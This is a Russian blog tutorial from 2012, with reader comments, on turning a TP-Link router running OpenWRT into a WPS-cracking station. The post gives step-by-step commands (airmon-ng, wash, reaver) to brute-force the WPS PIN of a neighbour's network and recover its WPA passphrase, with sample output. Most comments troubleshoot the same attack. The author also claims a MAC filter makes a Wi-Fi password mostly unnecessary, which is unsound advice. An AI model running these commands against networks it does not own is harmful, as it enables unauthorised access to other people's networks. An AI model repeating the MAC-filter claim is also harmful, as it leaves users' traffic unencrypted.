04 октября 2012

Reaver или делаем из TL-WR1043ND (v1) хак-станцию

Здрасьте. Надысь, дали покурочить девайс Pineapple Mark IV. Что сказать, устройство интересное, хотя и не оригинальное, ибо от того же TP-Link отличается только специальной прошивкой на основе OpenWRT с массой хитрых программ для всё того  же аудита, менее мощным Wi-Fi адаптером (300mW супротив 500mW у TP-Link в режиме US-диапазона), и слегка закрытым "комунити", чрезвычайно неторопливо выпускающем обновления =)


Собсна, взять простой этот самый TP-Link, нашпиговать массой утилит и пригламурить это всё кулхацкер-стайл интерфейсом - и не отличить от Pineapple. Но суть не в этом. Есть там в этом ананасе интересная утилита - Reaver. Служит она для проверки устойчивости к несанкционированному доступу Wi-Fi сетей с включённой опцией WPS. А включена она сейчас практически везде, и всё для тех же глупых и нетерпеливых пользователей, любящих настраивать всё одной кнопочкой =) Насколько известно мне, основная масса устройств (роутеры, точки доступа) уже обзавелись новыми прошивками позволяющими отключать этот режим, но кто же из пользователей, в здравом уме будет:
  1. Прошивать свой аппарат новой прошивкой
  2. Отключать эту очень полезную (с их точки зрения) функцию WPS
Беда состоит в том, что облегчив жизнь простым пользователям, инженеры и программисты, разработавшие WPS, открыли настежь двери и без того дырявой безопасности Wi-Fi. Не, я не спорю, если использовать сертификаты, "белые списки доступа" и прочие Radius-авторизации - изучать через WPS сеть бессмысленно (почти). Но кто же это настраивает эти вещи у себя?) Параноик, сисадминищще или человек, знающий о безопасности не по корочкам полученным за красивые глаза =)

От слов к делу. Заходим в OpenWRT интерфейс, нашего дорогого сердцу, WR1043ND: Сеть => Wi-Fi => Редактировать => Режим - Монитор. Попутно зайдя во вкладку Расширенные настройки, выставим в поле Регион значение US - United States (это позволит повысить мощность на предыдущей вкладке с разрешённой в РФ мощности излучателя для бытовых WiFi с 200mW до 500mW). Вернёмся на предыдущую вкладку и нажмём кнопку Включить, дабы, собсна, включить Wi-Fi адаптер. С гуёвой настройкой покончено, дальше продолжаем в консоли SSH =)

Заходим по SSH на наш роутер. Выполняем 3 команды (интернет должен быть уже настроен, т.к. пакеты берутся оттуда; либо как вариант сделать локальное зеркало у себя, особенно учитывая состояние openwrt.org в данный момент): обновление списка пакетов, установка Reaver, установка Aircrack-ng:
opkg update
opkg install reaver
opkg install aircrack-ng
opkg install wireless-tools

Собсна, зачем нам aircrack-ng? Это тоже чудный инструмент, но для более брутального изучения криптоустойчивости алгоритмов WEP/WPA/WPA2 применяемых для шифрования Wi-Fi. Из этого пакета нам нужен будет только инструмент airmon-ng для включения интерфейса мониторинга (то что мы включили в гуёвом интерфейсе - это всего лишь указание ничего не делать с адаптером и просто его включить, не поднимая никаких hostapd и прочих, не нужных для аудита весчей).

Включаем интерфейс монитора:
airmon-ng start wlan0

Теперь посмотрим, а какие вокруг есть сети с поддержкой WPS:
wash -i mon0 -s
Флаг -s заставляет насильно сканировать сеть, а не тупо наблюдать за пойманными пакетами (по-умолчанию используется режим survey).

Подождав немного, прерываем наблюдение, ибо wash запускается в бесконечном режиме, и получаем примерно такую картину:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
--------------------------------------------------------------------------------------
DE:AD:BE:EF:B4:BC     1       -45   1.0          No          Vasya_net
AB:BA:BC:CB:50:A6     1       -78   1.0          No          Petya_net
CA:CB:CD:AC:7F:74     5       -88   1.0          No          Nyashka

Начинать изучение советую с наиболее сильной точки (определяется по столбцу RSSI, чем меньше значение - тем сильнее), в данном случае это Vasya_net. Почему с самой сильной? Да просто анализ будет быстрее =)

От этой точки нам важен BSSID - DE:AD:BE:EF:B4:BC. Скармливаем его reaver'у:
reaver -a -v -S -w -d0 -i mon0 -b DE:AD:BE:EF:B4:BC

Процесс пошёл:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from DE:AD:BE:EF:B4:BC
[+] Associated with DE:AD:BE:EF:B4:BC (ESSID: Vasya_net)
[+] Trying pin 25515671
[+] Trying pin 25515671
[+] 00.00% complete @ 2012-10-04 03:38:03 (0 seconds/pin)
[+] Trying pin 25515671
[+] Trying pin 25515671
[+] Trying pin 25515671
[+] 00.01% complete @ 2012-10-04 03:38:19 (0 seconds/pin)
[+] Trying pin 25525670
[+] Trying pin 25525670
[+] Trying pin 25525670
...

По итогу (процесс может занять довольно долгое время, а может и сработать сразу), высветится что-то вроде:
[+] Trying pin 99557712
[+] WPS PIN: '99557712'
[+] WPA PSK: 'vasin_super_parol'
[+] AP SSID: 'Vasya_net'

Вуаля) PIN подобран, ключ сети выяснен =)

PS: Что самое весёлое - изначально на TL-WR1043ND тоже есть WPS (точнее он называется там QSS, но смысл тот же). Прошив его OpenWRT - эта фича пропадаёт начисто и поднять его не так просто, но можно. Но зачем?) Зато на эту кнопочку можно повесить что-нибудь своё - например запуск скрипта по подбору PIN =)

37 комментариев:

  1. А есть какие готовые скрипты для wash & reaver чтобы вешать на кнопочу?

    ОтветитьУдалить
  2. Например: http://code.google.com/p/wifite/

    ОтветитьУдалить
  3. Анонимный14.01.2013, 23:28

    ну а как этим PIN-ом воспользоваться на той-же Openwrt(1043nd)

    ОтветитьУдалить
  4. Анонимный14.01.2013, 23:30

    sorry. не внимателен, вот же он
    [code][+] WPA PSK: 'vasin_super_parol'
    [/code]

    ОтветитьУдалить
  5. [!] Found packet with bad FCS, skipping..
    А это что значит? Висит достаточно долго

    ОтветитьУдалить
    Ответы
    1. это либо карточка не держит, либо сигнал барахлит
      можно подавить эти сообщения: wash --ignore-fcs
      но особо радоваться нечему =)

      Удалить
  6. да уж. вместе с этим параметром ничего не показывает. пустая таблица. хотя в гуе показывает 2 сети на 6-ом канале.

    А все описанное выше может относиться ко всем роутерам с опенврт? Просто на моем 842-ом тплике максимальная мощность 125 мватт

    ОтветитьУдалить
    Ответы
    1. OpenWRT тут вообще не при делах) Тут зависит больше от чипа wifi - у 842-го он AR9287, у 1043 - AR9103. Можете почитать на просторах интернета про AR9287 и отзывы о нём не особо впечатляют. Ну и сам роутер как бы не особо =) Если такая потребность ломать - берите Alfa AWUS036H =)

      Удалить
  7. Анонимный28.11.2013, 23:09

    Добрый день!
    Подскажите, а как сделать обратную операцию по отключению чужого роутера от моей сетки?
    Спасибо!

    ОтветитьУдалить
    Ответы
    1. 1) Отключить функцию WPS/QSS в своём роутере
      2) Сменить пароль на WiFi
      3) Ввести фильтр MAC-адресов (белый список - когда перечислены разрешённые устройства или чёрный список - когда запрещены определённые).

      Удалить
  8. Анонимный29.11.2013, 23:18

    Спасибо! А как же пользоваться радиусом?

    ОтветитьУдалить
    Ответы
    1. Тот кто умеет им пользоваться - обычно знают зачем он им =)
      А если вы спрашиваете, то походу не очень. Грубо говоря. это центр авторизации, когда надо на предприятии/провайдере объединить несколько систем авторизаций - в домене, в wifi, в vpn и так далее. Т.е. вынести все эти WEP/WPA на отдельное устройство с более шировким функционалом.

      Удалить
  9. Анонимный01.12.2013, 00:41

    Ну, насчет моего незнания логика у вас железная! :) Надеюсь с вашей помощью узнаю все тонкости настройки роутера.
    Тем не менее спасибо! Я так понимаю, что для домашней сети радиус не актуален?!
    Кстати, хотел спросить, если я введу фильтр мас-адресов, то пароль на wifi, в принципе, не нужен?

    ОтветитьУдалить
    Ответы
    1. Ну вобщем - да, дома такое мало кто поднимает, разве что маньяки-админы.
      Да, если введёте фильтр то пароль не особо нужен. Есть потенциальная опасность конечно - если перехватят MAC-адреса ваших разрешённых устройств то могут зайти подменив свои на эти. Плюс будет неудобство с новыми устройствами (гости, например) - их придётся забивать тоже =)

      Удалить
    2. Анонимный08.01.2014, 16:36

      Но и трафик не шифруется.

      Удалить
  10. Анонимный01.12.2013, 23:06

    Этими неудобствами можно пренебречь. Зато, насколько я понимаю, скорость должна увеличиться. Ведь в защищенной сети постоянно проверяется пароль? С каждым пакетом? Я хочу подключить приставку и попробовать посмотреть ip-телевидение. А скорость на инете у меня всего 2,5 мб. Так что хочу выжать все. Подскажете как лучше настроить роутер, чтобы и хулиганы не заходили и скорость была высокой?

    ОтветитьУдалить
  11. Такое было актуально раньше, когда и девайсы были зелёными и солнце было ярче =) Сейчас процессоры и чипы wifi довольно шустро обрабатывают шифрование на аппаратном уровне и считается что его включение понижает пропускную способность не более чем на 5%.

    Если вы собрались смотреть IPTV по wifi - лучше забыть про этот роутер =) Для IPTV через wifi лучше использовать роутеры с поддержкой 5GHz диапазона - там скорости будут ещё круче (у меня удавалось прокачать до реальных 100 мбит). Если IPTV будет по кабелю от роутера до приставки - то пофиг, хватит всему, т.к. там гигабитные порты.

    ОтветитьУдалить
  12. Анонимный03.12.2013, 23:15

    Спасибо за хороший совет!
    Удачи вам! Буду потихоньку разбираться.

    ОтветитьУдалить
  13. Этот комментарий был удален автором.

    ОтветитьУдалить
  14. НЕ получается первый шаг... Как быть?
    root@OpenWrt:~# airmon-ng start wlan0
    Wireless tools not found

    Вот лог.

    root@OpenWrt:~# opkg update
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/Packages.gz.
    Updated list of available packages in /var/opkg-lists/attitude_adjustment.
    root@OpenWrt:~# opkg install reaver
    Installing reaver (r113-1) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/reaver_r113-1_ar71xx.ipk.
    Installing libpcap (1.1.1-2) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/libpcap_1.1.1-2_ar71xx.ipk.
    Installing libsqlite3 (3071201-1) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/libsqlite3_3071201-1_ar71xx.ipk.
    Installing libpthread (0.9.33.2-1) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/libpthread_0.9.33.2-1_ar71xx.ipk.
    Configuring libpthread.
    Configuring libpcap.
    Configuring libsqlite3.
    Configuring reaver.
    root@OpenWrt:~# opkg install aircrack-ng
    Installing aircrack-ng (1.1-3) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/aircrack-ng_1.1-3_ar71xx.ipk.
    Installing libopenssl (1.0.1e-1) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/libopenssl_1.0.1e-1_ar71xx.ipk.
    Installing zlib (1.2.7-1) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/zlib_1.2.7-1_ar71xx.ipk.
    Configuring zlib.
    Configuring libopenssl.
    Configuring aircrack-ng.
    root@OpenWrt:~#

    root@OpenWrt:~# airmon-ng start wlan0
    Wireless tools not found
    root@OpenWrt:~#

    ОтветитьУдалить
  15. unknown package 'wireless-tools'
    collected errors: opkg_install_cmd: cannot install package wireless-tools

    ОтветитьУдалить
  16. Спасибо, прокатило. Но :
    "Alexander L.1 августа 2013 г., 14:10
    [!] Found packet with bad FCS, skipping..
    А это что значит? Висит достаточно долго"

    То же самое. Роутер 100% рабочий. И рядом в этой же комнате есть роутеры с wps. Но не находит ничего, даже просто роутеры не видит. ПОстоянно на Found packet with bad FCS, skipping.. Через usb адаптер на пк с ос BackTrack работает. .... Есть еще идеи?

    ОтветитьУдалить
  17. Ответы
    1. Идей - вагон и маленькая тележка =)
      1. Аппаратная версия роутера? v1 или v2?
      2. Делаете ли airmon-ng start wlan0 перед wash/reaver? Если радиомодуль не перевести в режим monitor то может быть подобное.
      3. Google =)

      Удалить
  18. root@OpenWrt:~# airmon-ng start wlan0
    ps: invalid option -- A
    BusyBox v1.19.4 (2013-03-14 11:28:31 UTC) multi-call binary.

    Usage: ps

    Show list of processes

    w Wide output



    Interface Chipset Driver

    wlan0 Atheros ath9k - [phy0]
    (monitor mode enabled on mon0)

    root@OpenWrt:~# wash -i mon0

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    --------------------------------------------------------------------------------------
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...

    ОтветитьУдалить
    Ответы
    1. Большое подозрение, что радио-модуль уже занят чем-то. Возможно работает ранее созданная wifi-сеть, а вы пытаетесь добавить mon0 =)
      Для надежности лучше их все отключить/удалить, и создать новую wifi-cеть в режиме "Монитор". Это гарантирует поднятие "чистого" интерфейса.

      Удалить
  19. Этот комментарий был удален автором.

    ОтветитьУдалить
  20. Этот комментарий был удален автором.

    ОтветитьУдалить
  21. у меня 1043nd v2 . Не работает команда wash -i mon0 -s , точнее команда выполняется, но процесс поиска не идет, сразу выходит таблица этой команды и все, далее мгновенно появляется строка ожидания новой команды. Представляю лог моих действий:

    root@OpenWrt:~# airmon-ng start wlan0
    ps: invalid option -- A
    BusyBox v1.19.4 (2014-04-10 07:31:29 UTC) multi-call binary.

    Usage: ps

    Show list of processes

    w Wide output



    Interface Chipset Driver

    wlan0 Atheros ath9k - [phy0]
    (monitor mode enabled on mon0)

    root@OpenWrt:~# iwconfig
    lo no wireless extensions.

    mon0 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
    RTS thr:off Fragment thr:off
    Power Management:off

    eth1 no wireless extensions.

    wlan0 IEEE 802.11bgn Mode:Master Tx-Power=20 dBm
    RTS thr:off Fragment thr:off
    Power Management:off

    eth0 no wireless extensions.

    root@OpenWrt:~# ifconfig
    eth0 Link encap:Ethernet HWaddr C0:4A:00:49:5F:D1
    inet6 addr: fe80::c24a:ff:fe49:5fd1/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:65 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:24421 (23.8 KiB)
    Interrupt:4

    eth1 Link encap:Ethernet HWaddr C0:4A:00:49:5F:D0
    inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
    inet6 addr: fe80::c24a:ff:fe49:5fd0/64 Scope:Link
    inet6 addr: fde3:9a4f:c2f9::1/60 Scope:Global
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:1131 errors:0 dropped:0 overruns:0 frame:0
    TX packets:870 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:115786 (113.0 KiB) TX bytes:186494 (182.1 KiB)
    Interrupt:5

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:65536 Metric:1
    RX packets:1443 errors:0 dropped:0 overruns:0 frame:0
    TX packets:1443 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:98092 (95.7 KiB) TX bytes:98092 (95.7 KiB)

    mon0 Link encap:UNSPEC HWaddr C0-4A-00-49-5F-CF-00-44-00-00-00-00-00-00-00-00
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:551 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:128688 (125.6 KiB) TX bytes:0 (0.0 B)

    wlan0 Link encap:Ethernet HWaddr C0:4A:00:49:5F:CF
    inet6 addr: fe80::c24a:ff:fe49:5fcf/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:480 (480.0 B)

    root@OpenWrt:~# wash -i mon0 -s

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    --------------------------------------------------------------------------------------



    root@OpenWrt:~#
    Далее ради интереса ввожу
    root@OpenWrt:~# airodump-ng mon0
    CH -1 ][ Elapsed: 16 s ][ 2014-04-11 22:13

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    10:FE:ED:77:87:F4 0 22 0 0 6 54e. WPA2 TKIP PSK dfghr
    C0:4A:00:4C:A8:66 0 79 0 0 9 54e. WPA2 CCMP PSK TP-LINK_269
    FC:75:16:E8:92:48 0 165 65 29 11 54e WPA2 CCMP PSK Home 281

    BSSID STATION PWR Rate Lost Packets Probes

    FC:75:16:E8:92:48 84:7A:88:98:84:75 -1 0e- 0 0 65

    root@OpenWrt:~# reaver -a -v -S -w -d0 -i mon0 -b 10:FE:ED:77:87:F4

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 10:FE:ED:77:87:F4
    [!] WARNING: Failed to associate with 10:FE:ED:77:87:F4 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:FE:ED:77:87:F4 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:FE:ED:77:87:F4 (ESSID: (null))

    И так до посинения. Кстати станция «dfghr» к которой я подбираю пароль моя, которая рядом. Там QSS я включил.

    ОтветитьУдалить
    Ответы
    1. v2 вроде только в транках поддержку включили

      К сожалению, у меня нет опыта работы с ним. В настройках wifi (Сеть->Wi-Fi) на этом адаптере (radio0) должна стоять только 1 настройка с режимом Monitor, плюс он должен быть включен

      Удалить
  22. Ответы
    1. Решил так: http://downloads.openwrt.org/attitude_adjustment/12.09-rc1/ar71xx/generic/packages/reaver_r113-1_ar71xx.ipk

      Теперь др. Ошибка, при wash -i mon0 -s
      Выдает: can't load libpcap.so.1.1

      Удалить
    2. Наверно нужно взять там же http://downloads.openwrt.org/attitude_adjustment/12.09-rc1/ar71xx/generic/packages/libpcap_1.1.1-2_ar71xx.ipk
      =)
      Но я бы смотрел уже в сторону reaver-wps-t6x https://forums.hak5.org/index.php?/topic/35864-release-pixiewps-11-reaver-152/

      Удалить
  23. Анонимный28.05.2016, 13:29

    [!] WARNING: Failed to associate with AC:F1:DF:29:73:8E (ESSID: Slavka-31)

    и ничего

    ОтветитьУдалить